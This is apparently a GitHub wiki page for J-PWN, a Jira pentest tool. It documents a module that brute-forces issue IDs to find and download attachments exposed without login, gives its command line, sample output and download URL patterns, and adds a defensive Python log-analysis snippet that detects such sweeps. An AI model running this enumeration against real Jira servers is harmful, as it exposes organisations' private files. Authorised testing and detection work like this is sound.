Unauthenticated Public Access to Issue Attachments - carnal0wnage/J-PWN GitHub Wiki
Category: [Info Disclosure]
[CG] This module will attempt to identify any publicly accessible attachments to issues by brute forcing issue IDs
module name: check_download_public_issue_attachment
url: /rest/api/2/issue/<issue_id>/?fields=attachment
python3 j-pwn.py --single https://JIRASERVER/ --module check_download_public_issue_attachment --start_id=10000 --end_id=20000
[INFO] Running single module: check_download_public_issue_attachment
INFO: Issue with Attachment with threading start_id:10000 end_id:20000
[Testing URL]: https://JIRASERVER/rest/api/2/issue/<issue_id>/?fields=attachment
INFO: Total issues to check: 10001
- No attachments found in issue 14000
- No attachments found in issue 16000
- No attachments found in issue 13000
- No attachments found in issue 12000
- No attachments found in issue 15000
- No attachments found in issue 10000
- No attachments found in issue 11000
- No attachments found in issue 17000
- No attachments found in issue 19000
- No attachments found in issue 18000
- No attachments found in issue 11001
- No attachments found in issue 10001
- No attachments found in issue 16001
[+] Attachments found in issue 17707:
- Filename: issue.png
- Content URL: https://JIRASERVER/rest/api/2/attachment/content/10979
- Filename: issue1.png
- Content URL: https://JIRASERVER/rest/api/2/attachment/content/10978
- No attachments found in issue 19001
- No attachments found in issue 15001
- No attachments found in issue 12001
- No attachments found in issue 17001
Sometimes it will give you a Content URL that you can just download:
https://JIRAEXAMPLE/secure/attachment/10204/uploaded.pdf
If you get a Content URL like the ones in the output above (/rest/api/2/attachment/content/10979), you need to request:
https://JIRAEXAMPLE/secure/attachment/10979/issue.png
or
https://JIRAEXAMPLE/secure/attachmentzip/17707.zip
(download all attachments in a zip file)
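From the defender's side, the sweep this module performs shows up in web access logs as one unauthenticated client requesting `?fields=attachment` for many different numeric issue IDs. The following is an added example, not part of J-PWN: it assumes a combined-format access log where the user field is `-` for requests without a login, and the log lines, IP addresses, status codes, user name and threshold are constructed.

```python
import re
from collections import defaultdict

# Request shape from this page: /rest/api/2/issue/<numeric id>/?fields=attachment
# Assumed log layout (combined format): ip ident user [time] "request" status bytes
SWEEP_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"GET /rest/api/2/issue/(?P<issue_id>\d+)/?\?fields=attachment[^"]*" '
    r'(?P<status>\d{3}) '
)

def find_issue_id_sweeps(log_lines, min_distinct_ids=5):
    """Return {client_ip: summary} for unauthenticated clients that asked for the
    attachment field of at least min_distinct_ids different numeric issue IDs."""
    ids_by_ip = defaultdict(set)
    answered_by_ip = defaultdict(set)
    for line in log_lines:
        m = SWEEP_RE.match(line)
        if not m or m.group("user") != "-":  # "-" = no logged-in user (assumption)
            continue
        issue_id = int(m.group("issue_id"))
        ids_by_ip[m.group("ip")].add(issue_id)
        if m.group("status") == "200":  # issue data was served to an anonymous client
            answered_by_ip[m.group("ip")].add(issue_id)
    return {
        ip: {"distinct_ids": len(ids),
             "id_range": (min(ids), max(ids)),
             "answered_200": sorted(answered_by_ip[ip])}
        for ip, ids in ids_by_ip.items() if len(ids) >= min_distinct_ids
    }

def _line(ip, user, issue_id, status):
    # Builds one constructed log line; timestamp and byte count are placeholders.
    return (f'{ip} - {user} [01/Jan/2025:10:00:00 +0000] '
            f'"GET /rest/api/2/issue/{issue_id}/?fields=attachment HTTP/1.1" {status} 512')

# Constructed sample: one anonymous sweep, one logged-in view, one lone anonymous view.
SAMPLE_LOG = (
    [_line("203.0.113.7", "-", i, 200 if i == 17707 else 404) for i in range(17700, 17710)]
    + [_line("198.51.100.20", "alice", 17707, 200)]
    + [_line("198.51.100.21", "-", 17707, 200)]
)

if __name__ == "__main__":
    for ip, summary in find_issue_id_sweeps(SAMPLE_LOG).items():
        print(ip, summary)
```

Issue IDs listed under `answered_200` were readable without a login and are the ones to review for anonymous access.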